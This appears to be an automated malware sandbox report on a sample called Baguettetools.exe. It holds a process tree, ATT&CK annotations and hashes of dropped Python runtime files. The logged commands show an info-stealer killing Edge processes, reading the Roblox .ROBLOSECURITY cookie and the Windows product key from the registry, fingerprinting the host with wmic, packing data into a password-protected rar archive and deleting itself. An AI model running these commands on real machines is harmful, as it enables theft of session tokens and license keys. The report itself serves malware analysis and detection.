                                                                    PID:5288
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5088"
                                                                  3⤵
                                                                    PID:5160
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      taskkill /F /PID 5088
                                                                      4⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5432
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3808"
                                                                    3⤵
                                                                      PID:5348
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        taskkill /F /PID 3808
                                                                        4⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:5372
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5088"
                                                                      3⤵
                                                                        PID:5260
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          taskkill /F /PID 5088
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2664
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4312"
                                                                        3⤵
                                                                          PID:5284
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            taskkill /F /PID 4312
                                                                            4⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:5700
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4312"
                                                                          3⤵
                                                                            PID:2240
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              taskkill /F /PID 4312
                                                                              4⤵
                                                                              • Kills process with taskkill
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:1436
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4368"
                                                                            3⤵
                                                                              PID:4600
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                taskkill /F /PID 4368
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5228
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3860"
                                                                              3⤵
                                                                                PID:4228
                                                                                • C:\Windows\system32\taskkill.exe
                                                                                  taskkill /F /PID 3860
                                                                                  4⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4716
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4368"
                                                                                3⤵
                                                                                  PID:2044
                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                    taskkill /F /PID 4368
                                                                                    4⤵
                                                                                    • Kills process with taskkill
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1932
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3860"
                                                                                  3⤵
                                                                                    PID:3420
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      4⤵
                                                                                        PID:5776
                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                        taskkill /F /PID 3860
                                                                                        4⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1772
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1728"
                                                                                      3⤵
                                                                                        PID:5172
                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                          taskkill /F /PID 1728
                                                                                          4⤵
                                                                                          • Kills process with taskkill
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2340
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1728"
                                                                                        3⤵
                                                                                          PID:4728
                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                            taskkill /F /PID 1728
                                                                                            4⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:4772
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1616"
                                                                                          3⤵
                                                                                            PID:4692
                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                              taskkill /F /PID 1616
                                                                                              4⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:4832
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1616"
                                                                                            3⤵
                                                                                              PID:5880
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /F /PID 1616
                                                                                                4⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:812
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                              3⤵
                                                                                                PID:6076
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                  4⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5312
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4012"
                                                                                                3⤵
                                                                                                  PID:3540
                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                    taskkill /F /PID 4012
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5896
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3316"
                                                                                                  3⤵
                                                                                                    PID:5704
                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                      taskkill /F /PID 3316
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:1364
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                    3⤵
                                                                                                      PID:5460
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                        4⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5680
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI2122\rar.exe a -r -hp"croco31" "C:\Users\Admin\AppData\Local\Temp\rCN9i.zip" *"
                                                                                                      3⤵
                                                                                                        PID:2192
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI2122\rar.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI2122\rar.exe a -r -hp"croco31" "C:\Users\Admin\AppData\Local\Temp\rCN9i.zip" *
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4956
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                        3⤵
                                                                                                          PID:4352
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic os get Caption
                                                                                                            4⤵
                                                                                                              PID:5956
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                            3⤵
                                                                                                              PID:1952
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic computersystem get totalphysicalmemory
                                                                                                                4⤵
                                                                                                                  PID:3244
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                3⤵
                                                                                                                  PID:2460
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    4⤵
                                                                                                                      PID:912
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      wmic csproduct get uuid
                                                                                                                      4⤵
                                                                                                                        PID:748
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                      3⤵
                                                                                                                        PID:6108
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                          4⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4456
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                        3⤵
                                                                                                                          PID:2280
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic path win32_VideoController get name
                                                                                                                            4⤵
                                                                                                                            • Detects videocard installed
                                                                                                                            PID:2184
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                          3⤵
                                                                                                                            PID:1448
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                              4⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:1536
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe""
                                                                                                                            3⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            PID:5056
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping localhost -n 3
                                                                                                                              4⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:5648
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                        1⤵
                                                                                                                        • Enumerates system info in registry
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:3808
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff217546f8,0x7fff21754708,0x7fff21754718
                                                                                                                          2⤵
                                                                                                                            PID:5088
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
                                                                                                                            2⤵
                                                                                                                              PID:4312
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
                                                                                                                              2⤵
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              PID:4368
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                                                                                                                              2⤵
                                                                                                                                PID:3860
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
                                                                                                                                2⤵
                                                                                                                                  PID:1728
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                                  2⤵
                                                                                                                                    PID:1616
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
                                                                                                                                    2⤵
                                                                                                                                      PID:4012
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3840727843719049834,8078404368604232485,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
                                                                                                                                      2⤵
                                                                                                                                        PID:3316
                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:3988
                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                        1⤵
                                                                                                                                          PID:1980
                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x2f8 0x410
                                                                                                                                          1⤵
                                                                                                                                            PID:3708
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:4600
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                              1⤵
                                                                                                                                                PID:5852
                                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:5156
                                                                                                                                                • C:\Windows\System32\sihclient.exe
                                                                                                                                                  C:\Windows\System32\sihclient.exe /cv t9ZhzpBtx0qkByHt+TeM+w.0.2
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5704
                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1952

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                      Filesize

                                                                                                                                                      2KB

                                                                                                                                                      MD5

                                                                                                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                      SHA1

                                                                                                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                      SHA256

                                                                                                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                      SHA512

                                                                                                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                      Filesize

                                                                                                                                                      152B

                                                                                                                                                      MD5

                                                                                                                                                      7de1bbdc1f9cf1a58ae1de4951ce8cb9

                                                                                                                                                      SHA1

                                                                                                                                                      010da169e15457c25bd80ef02d76a940c1210301

                                                                                                                                                      SHA256

                                                                                                                                                      6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

                                                                                                                                                      SHA512

                                                                                                                                                      e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                      Filesize

                                                                                                                                                      152B

                                                                                                                                                      MD5

                                                                                                                                                      85ba073d7015b6ce7da19235a275f6da

                                                                                                                                                      SHA1

                                                                                                                                                      a23c8c2125e45a0788bac14423ae1f3eab92cf00

                                                                                                                                                      SHA256

                                                                                                                                                      5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

                                                                                                                                                      SHA512

                                                                                                                                                      eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                      Filesize

                                                                                                                                                      5KB

                                                                                                                                                      MD5

                                                                                                                                                      dc080f067df7690732ce15a3854c7165

                                                                                                                                                      SHA1

                                                                                                                                                      ac2622a1aae434c6b20528d005b547599ad61142

                                                                                                                                                      SHA256

                                                                                                                                                      5bb5bbf7632f07c00855faea2495a3d3b2ebdf32b1f17ea1b1bc024efe23dab8

                                                                                                                                                      SHA512

                                                                                                                                                      3cf46f4bbdde950ede0ae6da2f37a48ccc99ca9c7cba0ad95028f046e20dd660904154fbfdef428b432471e5757195ce3d4fc3d80b72b5806ea6c3248acd7e6e

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                      Filesize

                                                                                                                                                      944B

                                                                                                                                                      MD5

                                                                                                                                                      77d622bb1a5b250869a3238b9bc1402b

                                                                                                                                                      SHA1

                                                                                                                                                      d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                                                      SHA256

                                                                                                                                                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                                                      SHA512

                                                                                                                                                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\_bz2.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                      MD5

                                                                                                                                                      74bc4cb52e6b10983fdc2d40d611d8a4

                                                                                                                                                      SHA1

                                                                                                                                                      fc181a1167d77759781dc086e374f90c78930b7b

                                                                                                                                                      SHA256

                                                                                                                                                      57e4e02f82eeed869625e9e5e4f2d51f4f4819b24e04c8cee840d82133f2161a

                                                                                                                                                      SHA512

                                                                                                                                                      378c3fb1f8556cf2a3a0a5df5811903c1626a36fb5f6b52f719e3aa2e066fe1b7db83883f13bd57d5ff81a409919b9fafea0c1acb0980841bd62997a6b25b259

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\_ctypes.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      59KB

                                                                                                                                                      MD5

                                                                                                                                                      6e02d07340dfaea121a64bef762e0d67

                                                                                                                                                      SHA1

                                                                                                                                                      48b107a7391772ed849fd1f13a7d2eca9fc09593

                                                                                                                                                      SHA256

                                                                                                                                                      7035c88e2a0099785ef34f89275de92b34ef3299f01c816d844832c55701c3e3

                                                                                                                                                      SHA512

                                                                                                                                                      8790af18a4ac4a23f67c8c8e5db1217a399fe75519878e89da4faf87b08c8448aab42aa9ddf40087bc3e959a5490d861531637f3978b2ddcda4d727e60887b6e

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\_lzma.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      85KB

                                                                                                                                                      MD5

                                                                                                                                                      b5527d2f85ff0ef7c781447601c55e8e

                                                                                                                                                      SHA1

                                                                                                                                                      3c1f96424de9c6075d3dde9c2700027fe6dadb66

                                                                                                                                                      SHA256

                                                                                                                                                      67f56b6b023600b2ef2dac5b37c75d8df7197f3db714621055a2e37422316e27

                                                                                                                                                      SHA512

                                                                                                                                                      2ecaa3feda6669e541a9704c380bfa99580e2790795cacd626b3c99e906e698b42c62e7ee69bc48d1f4d3131a91901615b601523d0d95b2d9ba7ec6659a10a62

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\libffi-8.dll

                                                                                                                                                      Filesize

                                                                                                                                                      29KB

                                                                                                                                                      MD5

                                                                                                                                                      013a0b2653aa0eb6075419217a1ed6bd

                                                                                                                                                      SHA1

                                                                                                                                                      1b58ff8e160b29a43397499801cf8ab0344371e7

                                                                                                                                                      SHA256

                                                                                                                                                      e9d8eb01bb9b02ce3859ba4527938a71b4668f98897d46f29e94b27014036523

                                                                                                                                                      SHA512

                                                                                                                                                      0bd13fa1d55133ee2a96387e0756f48133987bacd99d1f58bab3be7bffdf868092060c17ab792dcfbb4680f984f40d3f7cc24abdd657b756496aa8884b8f6099

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\python3.dll

                                                                                                                                                      Filesize

                                                                                                                                                      66KB

                                                                                                                                                      MD5

                                                                                                                                                      77896345d4e1c406eeff011f7a920873

                                                                                                                                                      SHA1

                                                                                                                                                      ee8cdd531418cfd05c1a6792382d895ac347216f

                                                                                                                                                      SHA256

                                                                                                                                                      1e9224ba7190b6301ef47befa8e383d0c55700255d04a36f7dac88ea9573f2fb

                                                                                                                                                      SHA512

                                                                                                                                                      3e98b1b605d70244b42a13a219f9e124944da199a88ad4302308c801685b0c45a037a76ded319d08dbf55639591404665befe2091f0f4206a9472fee58d55c22

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI19042\python312.dll

                                                                                                                                                      Filesize

                                                                                                                                                      1.7MB

                                                                                                                                                      MD5

                                                                                                                                                      f23aa992b8e0a301ec8f473d6b784f4b

                                                                                                                                                      SHA1

                                                                                                                                                      ee73a5da238341cb21a781a3ddcb187d1f971680

                                                                                                                                                      SHA256

                                                                                                                                                      0ddfba7779ebc44f2fa819a78b54bc730a5543274986e973beee024fab0ecfc6

                                                                                                                                                      SHA512

                                                                                                                                                      028abb66298fee6173d34f80940f5bdd3988a8373234f32a780ae93e155d90af191d85164077d9b76dc3651bda4d9902ccbfd03d37be3e9662006b65c3defb35

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\VCRUNTIME140.dll

                                                                                                                                                      Filesize

                                                                                                                                                      106KB

                                                                                                                                                      MD5

                                                                                                                                                      4585a96cc4eef6aafd5e27ea09147dc6

                                                                                                                                                      SHA1

                                                                                                                                                      489cfff1b19abbec98fda26ac8958005e88dd0cb

                                                                                                                                                      SHA256

                                                                                                                                                      a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                                                                                                                                                      SHA512

                                                                                                                                                      d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\_bz2.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      48KB

                                                                                                                                                      MD5

                                                                                                                                                      85c70974fac8e621ed6e3e9a993fbd6f

                                                                                                                                                      SHA1

                                                                                                                                                      f83974e64aa57d7d027b815e95ebd7c8e45530f1

                                                                                                                                                      SHA256

                                                                                                                                                      610983bbcb8ee27963c17ead15e69ad76ec78fac64deb7345ca90d004034cdd6

                                                                                                                                                      SHA512

                                                                                                                                                      142792750e4a5189dbeaa710e3f5b3689d593927ea77ded00eb5caada6b88d82a37459770845f1ea7c9f45da5a6ae70e19bfcf76d9f1a56184c3164b736bcb18

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\_ctypes.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      59KB

                                                                                                                                                      MD5

                                                                                                                                                      e7ef30080c1785baf2f9bb8cf5afe1b2

                                                                                                                                                      SHA1

                                                                                                                                                      b7d7d0e3b15de9b1e177b57fd476cecbdd4fcb79

                                                                                                                                                      SHA256

                                                                                                                                                      2891382070373d5070cb8fd6676afc9f5eb4236251f8fc5c0941af0c53a2d31e

                                                                                                                                                      SHA512

                                                                                                                                                      c2ec431d2821879bb505d8eca13fa3921db016e00b8674fa62b03f27dc5cee6dd0de16ba567d19d4b0af9a5cb34d544383a68cc63ff2fa9d8bb55e356d0d73e6

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\_decimal.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      105KB

                                                                                                                                                      MD5

                                                                                                                                                      3923e27b9378da500039e996222ffee6

                                                                                                                                                      SHA1

                                                                                                                                                      a9280559a71abf390348e1b6a0fb1f2409649189

                                                                                                                                                      SHA256

                                                                                                                                                      0275b03041f966e587d1c4c50266c3fdff1e1a65f652ad07b59cb85845b5457e

                                                                                                                                                      SHA512

                                                                                                                                                      051c613403fd80b9582dd48c1f38870cb26846d54b75603ea52a78202a72272107e95750de78cd8f6c56951ebde501b4892d90fb306326b86124c8cc97bca594

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\_hashlib.pyd

                                                                                                                                                      Filesize

                                                                                                                                                      35KB

                                                                                                                                                      MD5

                                                                                                                                                      c8b153f0be8569ce2c2de3d55952d9c7

                                                                                                                                                      SHA1

                                                                                                                                                      0861d6dcd9b28abb8b69048caf3c073e94f87fdc

                                                                                                                                                      SHA256

                                                                                                                                                      af9f39d2a5d762214f6de2c8fec0a5bc6be0b8223ef47164caa4c6e3d6437a58

                                                                                                                                                      SHA512

                                                                                                                                                      81ccbfff0f4cdd1502af9d73928b940098b9acc58b19c1a939ecdf17418096294af4a4529ee7a0bbe1c686e3b0254651e211c1093264d1835065a82711ac0379

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI2122\_lzma.pyd

                                                                                                                                                      Filesize
